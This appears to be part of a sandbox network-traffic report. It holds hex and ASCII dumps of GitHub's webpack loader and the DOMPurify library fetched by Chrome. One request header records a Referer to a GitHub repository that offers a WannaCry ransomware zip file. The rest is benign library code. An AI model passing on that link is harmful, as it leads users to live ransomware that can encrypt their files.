                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 7d 2c 5f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 6f 29 7b 76 61 72 20 64 3d 5f 5b 6f 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 64 29 72 65 74 75 72 6e 20 64 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 74 3d 5f 5b 6f 5d 3d 7b 69 64 3a 6f 2c 6c 6f 61 64 65 64 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6f 5d 2e 63 61 6c 6c 28 74 2e 65 78 70 6f 72 74 73 2c 74 2c 74 2e 65 78 70 6f 72 74 73 2c 73 29 2c 74 2e 6c 6f 61 64 65 64 3d 21 30 2c 74 2e 65 78 70 6f 72 74 73 7d 73 2e 6d 3d 65 2c 28 28 29 3d 3e 7b 76 61 72 20 65 3d 5b 5d 3b 73 2e 4f 3d 28 5f 2c 6f 2c 64 2c 74 29 3d 3e 7b 69 66 28 6f 29 7b 74 3d 74 7c 7c 30 3b 66 6f 72 28 76 61 72 20 61 3d 65 2e 6c
                                                                                      Data Ascii: (()=>{"use strict";var e={},_={};function s(o){var d=_[o];if(void 0!==d)return d.exports;var t=_[o]={id:o,loaded:!1,exports:{}};return e[o].call(t.exports,t,t.exports,s),t.loaded=!0,t.exports}s.m=e,(()=>{var e=[];s.O=(_,o,d,t)=>{if(o){t=t||0;for(var a=e.l
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 39 30 65 38 39 30 39 35 36 66 2e 6a 73 22 3a 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 22 3d 3d 3d 65 3f 22 22 2b 65 2b 22 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3a 22 75 69 5f 70 61 63 6b 61 67 65 73 5f 66 61 69 6c 62 6f 74 5f 66 61 69 6c 62 6f 74 5f 74 73 22 3d 3d 3d 65 3f 22 22 2b 65 2b 22 2d 35 62 64 39 62 61 36 33 39 63 63 30 2e 6a 73 22 3a 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 73 65 6c 65 63 74 6f 72 2d 6f 62 73 65 72 76 65 72 5f 64
                                                                                      Data Ascii: 90e890956f.js":"vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183"===e?""+e+"-79f9611c275b.js":"ui_packages_failbot_failbot_ts"===e?""+e+"-5bd9ba639cc0.js":"vendors-node_modules_github_selector-observer_d
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 65 3f 22 22 2b 65 2b 22 2d 39 35 62 38 34 65 65 36 62 63 33 34 2e 6a 73 22 3a 22 75 69 5f 70 61 63 6b 61 67 65 73 5f 70 61 74 68 73 5f 69 6e 64 65 78 5f 74 73 22 3d 3d 3d 65 3f 22 22 2b 65 2b 22 2d 65 61 33 65 31 62 32 61 33 33 63 36 2e 6a 73 22 3a 22 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 6c 6f 62 2d 61 6e 63 68 6f 72 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 74 65 72 2d 73 6f 72 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 2d 65 35 30 61 62 36 22 3d 3d 3d 65 3f 22 22 2b 65 2b 22 2d 66 64 38 33 39 36 64 32 34 39 30 62 2e 6a 73 22 3a 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 61 74 65 2d 66 6e 73 5f 66 6f 72 6d 61 74 5f 6d 6a 73
                                                                                      Data Ascii: e?""+e+"-95b84ee6bc34.js":"ui_packages_paths_index_ts"===e?""+e+"-ea3e1b2a33c6.js":"app_assets_modules_github_blob-anchor_ts-app_assets_modules_github_filter-sort_ts-app_assets_-e50ab6"===e?""+e+"-fd8396d2490b.js":"vendors-node_modules_date-fns_format_mjs
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6d 6c 2d 72 65 67 72 65 73 73 69 6f 6e 2d 73 69 6d 70 6c 65 2d 6c 69 6e 65 61 72 5f 73 72 63 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 79 64 72 6f 2d 61 6e 61 6c 79 2d 35 38 30 38 63 34 30 22 3d 3d 3d 65 3f 22 22 2b 65 2b 22 2d 36 31 34 33 38 32 37 31 65 61 64 37 2e 6a 73 22 3a 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 53 65 6c 65 63 74 50 61 6e 65 6c 5f 53 65 6c 65 63 74 50 61 6e 65 6c 5f 6a 73 22 3d 3d 3d 65 3f 22 22 2b 65 2b 22 2d 36 63 37 32 61 39 66 61 66 37 65 37 2e 6a 73 22 3a 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 74 61 6e 73 74 61 63 6b 5f
                                                                                      Data Ascii: s-node_modules_ml-regression-simple-linear_src_index_js-node_modules_github_hydro-analy-5808c40"===e?""+e+"-61438271ead7.js":"vendors-node_modules_primer_react_lib-esm_SelectPanel_SelectPanel_js"===e?""+e+"-6c72a9faf7e7.js":"vendors-node_modules_tanstack_
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 2e 6a 73 22 3a 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 50 6f 70 6f 76 65 72 5f 50 6f 70 6f 76 65 72 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 61 74 65 2d 66 6e 73 5f 64 69 66 66 65 72 65 6e 63 65 2d 61 35 38 32 62 32 22 3d 3d 3d 65 3f 22 22 2b 65 2b 22 2d 63 61 31 38 38 35 33 65 63 63 65 30 2e 6a 73 22 3a 22 75 69 5f 70 61 63 6b 61 67 65 73 5f 64 61 74 65 2d 70 69 63 6b 65 72 5f 64 61 74 65 2d 70 69 63 6b 65 72 5f 74 73 22 3d 3d 3d 65 3f 22 22 2b 65 2b 22 2d 39 33 33 34 38 65 37 36 38 35 35 30 2e 6a 73 22 3a 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 6c 61 63 6b 62 69 72 64 2d 70 61 72 73 65 72 5f 64 69 73 74
                                                                                      Data Ascii: .js":"vendors-node_modules_primer_react_lib-esm_Popover_Popover_js-node_modules_date-fns_difference-a582b2"===e?""+e+"-ca18853ecce0.js":"ui_packages_date-picker_date-picker_ts"===e?""+e+"-93348e768550.js":"vendors-node_modules_github_blackbird-parser_dist
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 61 30 65 32 39 31 61 30 32 39 38 2e 6a 73 22 3a 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 44 69 61 6c 6f 67 5f 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 44 69 61 6c 6f 67 5f 6a 73 22 3d 3d 3d 65 3f 22 22 2b 65 2b 22 2d 38 61 62 34 37 32 65 32 66 39 32 34 2e 6a 73 22 3a 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 41 76 61 74 61 72 5f 41 76 61 74 61 72 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 2d 32 62 65 30 32 36 22 3d 3d 3d 65 3f 22 22 2b 65 2b 22 2d 30 62 34 30 33 38 37 62 66 61 64 64
                                                                                      Data Ascii: a0e291a0298.js":"vendors-node_modules_primer_react_lib-esm_ConfirmationDialog_ConfirmationDialog_js"===e?""+e+"-8ab472e2f924.js":"vendors-node_modules_primer_react_lib-esm_Avatar_Avatar_js-node_modules_primer_react_lib-esm_-2be026"===e?""+e+"-0b40387bfadd
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 62 61 6e 6e 65 72 5f 64 69 73 74 5f 63 6f 6e 73 65 6e 74 2d 62 61 6e 6e 65 72 5f 6a 73 22 3a 22 37 65 66 33 30 37 31 62 37 31 31 63 22 2c 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 73 6f 72 74 61 62 6c 65 6a 73 5f 53 6f 72 74 61 62 6c 65 5f 6a 73 22 3a 22 34 38 63 65 30 62 66 36 32 61 61 62 22 2c 22 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 73 6f 72 74 61 62 6c 65 2d 62 65 68 61 76 69 6f 72 5f 74 73 22 3a 22 38 64 38 39 31 30 32 35 31 63 35 61 22 2c 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 79 64 72 6f 2d 61 6e 61 6c 79 74 69 63 73 2d 63 6c 69 65 6e 74 5f 64 69 73 74 5f 61 6e 61 6c 79 74 69 63 73 2d 63 6c 69 65 6e 74 5f 6a 73 2d
                                                                                      Data Ascii: banner_dist_consent-banner_js":"7ef3071b711c","vendors-node_modules_github_sortablejs_Sortable_js":"48ce0bf62aab","app_assets_modules_github_sortable-behavior_ts":"8d8910251c5a","vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 69 6f 72 73 5f 77 65 62 61 75 74 68 6e 2d 73 74 61 74 75 73 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 3a 22 31 38 34 33 33 64 62 62 61 64 39 32 22 2c 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 62 69 6c 6c 69 6e 67 5f 73 65 74 74 69 6e 67 73 5f 64 6f 77 6e 67 72 61 64 65 2d 64 69 61 6c 6f 67 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 3a 22 38 30 61 35 62 38 66 36 66 39 65 65 22 2c 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 62 69 6c 6c 69 6e 67 5f 73 65 74 74 69 6e 67 73 5f 75 70 67 72 61 64 65 5f 6d 61 6e 61 67 65 2d 73 75 62 73 63 72 69 70 74 69 6f 6e 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 3a 22 33 35 66 36 36 35 39 65 37 63 30 35 22 2c 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 62 69 6c 6c 69 6e 67 5f 73 74 61 66 66 74 6f 6f 6c 73 5f 70 65 6e 64 69 6e 67
                                                                                      Data Ascii: iors_webauthn-status-element_ts":"18433dbbad92","app_components_billing_settings_downgrade-dialog-element_ts":"80a5b8f6f9ee","app_components_billing_settings_upgrade_manage-subscription-element_ts":"35f6659e7c05","app_components_billing_stafftools_pending
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 32 32 36 22 2c 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 63 6f 6d 6d 61 6e 64 5f 70 61 6c 65 74 74 65 5f 63 6f 6d 6d 61 6e 64 2d 70 61 6c 65 74 74 65 2d 70 61 67 65 2d 73 74 61 63 6b 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 3a 22 66 63 61 39 32 34 34 34 34 34 38 31 22 2c 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 63 6f 6e 64 75 69 74 5f 66 65 65 64 2d 70 6f 73 74 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 3a 22 37 34 66 32 65 37 65 63 30 64 34 30 22 2c 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 63 6f 70 69 6c 6f 74 5f 63 6f 70 69 6c 6f 74 2d 73 69 67 6e 75 70 2d 63 68 6f 6f 73 65 2d 70 6c 61 6e 2d 74 79 70 65 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 3a 22 38 32 32 36 30 32 31 34 37 32 34 66 22 2c 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 63 6f 70 69
                                                                                      Data Ascii: 226","app_components_command_palette_command-palette-page-stack-element_ts":"fca924444481","app_components_conduit_feed-post-element_ts":"74f2e7ec0d40","app_components_copilot_copilot-signup-choose-plan-type-element_ts":"82260214724f","app_components_copi
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 74 68 75 62 5f 72 65 6d 6f 74 65 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 3a 22 35 35 33 31 64 64 37 31 63 32 33 30 22 2c 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 68 79 64 72 6f 5f 64 69 61 6c 6f 67 2d 68 79 64 72 6f 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 3a 22 37 34 64 33 63 38 39 62 63 34 37 31 22 2c 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 68 79 64 72 6f 5f 74 72 61 63 6b 2d 76 69 65 77 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 3a 22 32 31 65 66 38 65 30 61 39 32 37 38 22 2c 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 69 73 73 75 65 73 5f 72 65 66 65 72 65 6e 63 65 73 5f 64 65 76 65 6c 6f 70 6d 65 6e 74 2d 6d 65 6e 75 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 3a 22 62 30 37 63 33 66 30 66 39 38 61 32 22 2c 22 61 70 70 5f
                                                                                      Data Ascii: thub_remote-pagination-element_ts":"5531dd71c230","app_components_hydro_dialog-hydro-element_ts":"74d3c89bc471","app_components_hydro_track-view-element_ts":"21ef8e0a9278","app_components_issues_references_development-menu-element_ts":"b07c3f0f98a2","app_


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.2.1649715185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:21 UTC681OUTGET /assets/vendors-node_modules_dompurify_dist_purify_js-6890e890956f.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:22 UTC690INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 22613
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 24 Oct 2023 17:57:35 GMT
                                                                                      ETag: 0x8DBD4BAB3E93C20
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:21 GMT
                                                                                      Age: 2612557
                                                                                      X-Served-By: cache-iad-kiad7000110-IAD, cache-lga21948-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 13613, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 1c1b9006b65103fc7a8bb600ca26f18ff6739f18
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 6f 6d 70 75 72 69 66 79 5f 64 69 73 74 5f 70 75 72 69 66 79 5f 6a 73 22 5d 2c 7b 32 37 38 35 36 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 2f 2a 21 20 40 6c 69 63 65 6e 73 65 20 44 4f 4d 50 75 72 69 66 79 20 33 2e 30 2e 31 20 7c 20 28 63 29 20 43 75 72 65 35 33 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 41 70 61 63 68 65 20 6c 69 63 65 6e 73 65 20 32 2e 30 20 61 6e 64 20 4d 6f 7a 69 6c 6c 61 20 50 75 62 6c 69 63 20 4c 69
                                                                                      Data Ascii: (globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_dompurify_dist_purify_js"],{27856:function(e){/*! @license DOMPurify 3.0.1 | (c) Cure53 and other contributors | Released under the Apache license 2.0 and Mozilla Public Li
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 20 62 65 20 69 74 65 72 61 62 6c 65 2c 20 6e 6f 6e 2d 61 72 72 61 79 20 6f 62 6a 65 63 74 73 20 6d 75 73 74 20 68 61 76 65 20 61 20 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 20 6d 65 74 68 6f 64 2e 22 29 7d 28 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 69 66 28 65 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 20 61 28 65 2c 74 29 3b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 73 6c 69 63 65 28 38 2c 2d 31 29 3b 69 66 28 22 4f 62 6a 65 63 74 22 3d 3d 3d 6e 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 28 6e 3d 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 29 2c 22 4d 61 70 22 3d 3d 3d 6e 7c 7c 22 53
                                                                                      Data Ascii: be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}function o(e,t){if(e){if("string"==typeof e)return a(e,t);var n=Object.prototype.toString.call(e).slice(8,-1);if("Object"===n&&e.constructor&&(n=e.constructor.name),"Map"===n||"S
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 74 69 6f 6e 20 43 28 65 2c 74 2c 6e 29 7b 6e 3d 6e 7c 7c 4e 2c 63 26 26 63 28 65 2c 6e 75 6c 6c 29 3b 66 6f 72 28 76 61 72 20 72 3d 74 2e 6c 65 6e 67 74 68 3b 72 2d 2d 3b 29 7b 76 61 72 20 6f 3d 74 5b 72 5d 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6f 29 7b 76 61 72 20 61 3d 6e 28 6f 29 3b 61 21 3d 3d 6f 26 26 28 75 28 74 29 7c 7c 28 74 5b 72 5d 3d 61 29 2c 6f 3d 61 29 7d 65 5b 6f 5d 3d 21 30 7d 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 76 61 72 20 74 2c 6e 3d 64 28 6e 75 6c 6c 29 2c 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69
                                                                                      Data Ascii: tion C(e,t,n){n=n||N,c&&c(e,null);for(var r=t.length;r--;){var o=t[r];if("string"==typeof o){var a=n(o);a!==o&&(u(t)||(t[r]=a),o=a)}e[o]=!0}return e}function D(e){var t,n=d(null),r=function(e,t){var n="undefined"!=typeof Symbol&&e[Symbol.iterator]||e["@@i
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 22 29 7d 28 29 29 2c 63 3d 69 5b 30 5d 2c 75 3d 69 5b 31 5d 3b 6e 5b 63 5d 3d 75 7d 7d 63 61 74 63 68 28 65 29 7b 72 2e 65 28 65 29 7d 66 69 6e 61 6c 6c 79 7b 72 2e 66 28 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 2c 74 29 7b 66 6f 72 28 3b 6e 75 6c 6c 21 3d 3d 65 3b 29 7b 76 61 72 20 6e 3d 6d 28 65 2c 74 29 3b 69 66 28 6e 29 7b 69 66 28 6e 2e 67 65 74 29 72 65 74 75 72 6e 20 4f 28 6e 2e 67 65 74 29 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 2e 76 61 6c 75 65 29 72 65 74 75 72 6e 20 4f 28 6e 2e 76 61 6c 75 65 29 7d 65 3d 73 28 65 29 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 66 61 6c 6c 62 61 63 6b 20 76 61 6c 75 65 20 66
                                                                                      Data Ascii: ")}()),c=i[0],u=i[1];n[c]=u}}catch(e){r.e(e)}finally{r.f()}return n}function R(e,t){for(;null!==e;){var n=m(e,t);if(n){if(n.get)return O(n.get);if("function"==typeof n.value)return O(n.value)}e=s(e)}return function(e){return console.warn("fallback value f
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 72 6b 65 72 22 2c 22 6d 61 73 6b 22 2c 22 6d 65 74 61 64 61 74 61 22 2c 22 6d 70 61 74 68 22 2c 22 70 61 74 68 22 2c 22 70 61 74 74 65 72 6e 22 2c 22 70 6f 6c 79 67 6f 6e 22 2c 22 70 6f 6c 79 6c 69 6e 65 22 2c 22 72 61 64 69 61 6c 67 72 61 64 69 65 6e 74 22 2c 22 72 65 63 74 22 2c 22 73 74 6f 70 22 2c 22 73 74 79 6c 65 22 2c 22 73 77 69 74 63 68 22 2c 22 73 79 6d 62 6f 6c 22 2c 22 74 65 78 74 22 2c 22 74 65 78 74 70 61 74 68 22 2c 22 74 69 74 6c 65 22 2c 22 74 72 65 66 22 2c 22 74 73 70 61 6e 22 2c 22 76 69 65 77 22 2c 22 76 6b 65 72 6e 22 5d 29 2c 49 3d 66 28 5b 22 66 65 42 6c 65 6e 64 22 2c 22 66 65 43 6f 6c 6f 72 4d 61 74 72 69 78 22 2c 22 66 65 43 6f 6d 70 6f 6e 65 6e 74 54 72 61 6e 73 66 65 72 22 2c 22 66 65 43 6f 6d 70 6f 73 69 74 65 22 2c 22 66 65
                                                                                      Data Ascii: rker","mask","metadata","mpath","path","pattern","polygon","polyline","radialgradient","rect","stop","style","switch","symbol","text","textpath","title","tref","tspan","view","vkern"]),I=f(["feBlend","feColorMatrix","feComponentTransfer","feComposite","fe
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 22 2c 22 62 67 63 6f 6c 6f 72 22 2c 22 62 6f 72 64 65 72 22 2c 22 63 61 70 74 75 72 65 22 2c 22 63 65 6c 6c 70 61 64 64 69 6e 67 22 2c 22 63 65 6c 6c 73 70 61 63 69 6e 67 22 2c 22 63 68 65 63 6b 65 64 22 2c 22 63 69 74 65 22 2c 22 63 6c 61 73 73 22 2c 22 63 6c 65 61 72 22 2c 22 63 6f 6c 6f 72 22 2c 22 63 6f 6c 73 22 2c 22 63 6f 6c 73 70 61 6e 22 2c 22 63 6f 6e 74 72 6f 6c 73 22 2c 22 63 6f 6e 74 72 6f 6c 73 6c 69 73 74 22 2c 22 63 6f 6f 72 64 73 22 2c 22 63 72 6f 73 73 6f 72 69 67 69 6e 22 2c 22 64 61 74 65 74 69 6d 65 22 2c 22 64 65 63 6f 64 69 6e 67 22 2c 22 64 65 66 61 75 6c 74 22 2c 22 64 69 72 22 2c 22 64 69 73 61 62 6c 65 64 22 2c 22 64 69 73 61 62 6c 65 70 69 63 74 75 72 65 69 6e 70 69 63 74 75 72 65 22 2c 22 64 69 73 61 62 6c 65 72 65 6d 6f 74 65
                                                                                      Data Ascii: ","bgcolor","border","capture","cellpadding","cellspacing","checked","cite","class","clear","color","cols","colspan","controls","controlslist","coords","crossorigin","datetime","decoding","default","dir","disabled","disablepictureinpicture","disableremote
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 74 69 6f 6e 22 2c 22 65 6e 64 22 2c 22 66 69 6c 6c 22 2c 22 66 69 6c 6c 2d 6f 70 61 63 69 74 79 22 2c 22 66 69 6c 6c 2d 72 75 6c 65 22 2c 22 66 69 6c 74 65 72 22 2c 22 66 69 6c 74 65 72 75 6e 69 74 73 22 2c 22 66 6c 6f 6f 64 2d 63 6f 6c 6f 72 22 2c 22 66 6c 6f 6f 64 2d 6f 70 61 63 69 74 79 22 2c 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 22 2c 22 66 6f 6e 74 2d 73 69 7a 65 22 2c 22 66 6f 6e 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 22 2c 22 66 6f 6e 74 2d 73 74 72 65 74 63 68 22 2c 22 66 6f 6e 74 2d 73 74 79 6c 65 22 2c 22 66 6f 6e 74 2d 76 61 72 69 61 6e 74 22 2c 22 66 6f 6e 74 2d 77 65 69 67 68 74 22 2c 22 66 78 22 2c 22 66 79 22 2c 22 67 31 22 2c 22 67 32 22 2c 22 67 6c 79 70 68 2d 6e 61 6d 65 22 2c 22 67 6c 79 70 68 72 65 66 22 2c 22 67 72 61 64 69 65 6e 74 75
                                                                                      Data Ascii: tion","end","fill","fill-opacity","fill-rule","filter","filterunits","flood-color","flood-opacity","font-family","font-size","font-size-adjust","font-stretch","font-style","font-variant","font-weight","fx","fy","g1","g2","glyph-name","glyphref","gradientu
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 22 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 22 2c 22 74 65 78 74 2d 61 6e 63 68 6f 72 22 2c 22 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 22 2c 22 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 22 2c 22 74 65 78 74 6c 65 6e 67 74 68 22 2c 22 74 79 70 65 22 2c 22 75 31 22 2c 22 75 32 22 2c 22 75 6e 69 63 6f 64 65 22 2c 22 76 61 6c 75 65 73 22 2c 22 76 69 65 77 62 6f 78 22 2c 22 76 69 73 69 62 69 6c 69 74 79 22 2c 22 76 65 72 73 69 6f 6e 22 2c 22 76 65 72 74 2d 61 64 76 2d 79 22 2c 22 76 65 72 74 2d 6f 72 69 67 69 6e 2d 78 22 2c 22 76 65 72 74 2d 6f 72 69 67 69 6e 2d 79 22 2c 22 77 69 64 74 68 22 2c 22 77 6f 72 64 2d 73 70 61 63 69 6e 67 22 2c 22 77 72 61 70 22 2c 22 77 72 69 74 69 6e 67 2d 6d 6f 64 65 22 2c 22 78 63 68 61 6e 6e 65 6c 73 65 6c 65 63 74
                                                                                      Data Ascii: "transform-origin","text-anchor","text-decoration","text-rendering","textlength","type","u1","u2","unicode","values","viewbox","visibility","version","vert-adv-y","vert-origin-x","vert-origin-y","width","word-spacing","wrap","writing-mode","xchannelselect
